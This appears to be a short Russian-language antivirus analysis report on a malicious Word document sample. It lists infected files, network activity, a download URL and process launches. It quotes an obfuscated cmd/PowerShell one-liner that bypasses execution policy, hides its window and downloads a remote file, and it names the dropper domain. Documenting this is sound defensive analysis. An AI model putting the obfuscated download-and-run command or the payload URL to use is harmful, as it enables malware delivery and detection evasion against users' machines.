Техническая информация
Для обеспечения автозапуска и распространения
Заражает следующие исполняемые файлы
- %ProgramFiles(x86)%\microsoft office\office16\winword.exe
Вредоносные функции
Загружает и запускает на исполнение
- http://dogtosamdnc.top/search.php как %appdata%.exe
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c "pOWEr^sH^ELL.ex^e -e^x^eC^ut^Io^npol^Icy^ ^BYPA^S^s^ ^-^NOPR^O^f^i^l^E -^w^IND^Ow^stYle^ HIdDe^N^ (^n^eW-^Ob^j^e^ct sYs^TeM.n^et^.W^EB^C^liEnT).d^ow^N^LoADfi^LE^('http://...
Сетевая активность
Подключается к
- 'me######.#emplates.cdn.office.net':443
TCP
Другие
- 'me######.#emplates.cdn.office.net':443
UDP
- DNS ASK me######.#emplates.cdn.office.net
- DNS ASK do###samdnc.top
Другое
Ищет следующие окна
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c "pOWEr^sH^ELL.ex^e -e^x^eC^ut^Io^npol^Icy^ ^BYPA^S^s^ ^-^NOPR^O^f^i^l^E -^w^IND^Ow^stYle^ HIdDe^N^ (^n^eW-^Ob^j^e^ct sYs^TeM.n^et^.W^EB^C^liEnT).d^ow^N^LoADfi^LE^('http://...' (со скрытым окном)
